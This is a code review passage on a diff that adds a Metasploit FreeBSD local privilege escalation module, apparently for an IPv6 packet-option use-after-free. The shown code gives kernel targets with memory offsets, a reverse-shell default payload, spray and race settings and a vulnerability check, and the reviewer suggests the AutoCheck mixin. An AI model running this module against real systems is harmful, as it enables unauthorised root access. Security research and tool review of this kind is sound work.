modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb

```diff
@@ -0,0 +1,251 @@
+              {
+                allproc: '0x1028880'
+              }
+            ],
+            [
+              'FreeBSD 9.2-RELEASE #0 r255898',
+              {
+                allproc: '0x11c9ba0'
+              }
+            ],
+            [
+              'FreeBSD 9.3-RELEASE #0 r268512',
+              {
+                allproc: '0x1295800'
+              }
+            ],
+            [
+              'FreeBSD 12.0-RELEASE r341666',
+              {
+                allproc: '0x1df3c38'
+              }
+            ],
+            [
+              'FreeBSD 12.1-RELEASE r354233',
+              {
+                allproc: '0x1df7648'
+              }
+            ],
+          ],
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'bsd/x64/shell_reverse_tcp',
+            'PrependFork' => true,
+            'WfsDelay' => 10
+          },
+        'Notes' =>
+          {
+            'Stability' => [CRASH_OS_RESTARTS],
+            'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+          },
+        'DefaultTarget' => 0
+      )
+    )
+    register_advanced_options([
+      OptInt.new('NUM_SPRAY', [true, 'Spray iterations', 256]),
+      OptInt.new('NUM_SPRAY_RACE', [true, 'Race iterations', 32]),
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status("Writing '#{path}' (#{data.size} bytes) ...")
+    rm_f(path)
+    write_file(path, data)
+    register_file_for_cleanup(path)
+  end
+
+  def strip_comments(c_code)
+    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+  end
+
+  def select_target(kernel_version)
+    targets.each do |t|
+      return t if kernel_version.include?(t.name)
+    end
+    nil
+  end
+
+  def check
+    kernel_version = cmd_exec('uname -v').to_s
+
+    unless kernel_version.include?('FreeBSD')
+      return CheckCode::Safe('Target system is not FreeBSD')
+    end
+
+    kernel_arch = cmd_exec('uname -m').to_s
+
+    unless kernel_arch.include?('64')
+      return CheckCode::Safe("System architecture #{kernel_arch} is not supported")
+    end
+
+    vprint_good("System architecture #{kernel_arch} is supported")
+
+    unless select_target(kernel_version)
+      return CheckCode::Safe("No target for #{kernel_version}")
+    end
+
+    vprint_good("#{kernel_version} appears vulnerable")
+
+    unless command_exists?('cc')
+      return CheckCode::Safe('cc is not installed')
+    end
+
+    vprint_good('cc is installed')
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning('Target does not appear to be vulnerable')
+    end
```

Comment:
Looks like you can just use the `Exploit::Remote::AutoCheck` mixin and remove the `ForceExploit` datastore option.

Reply:
done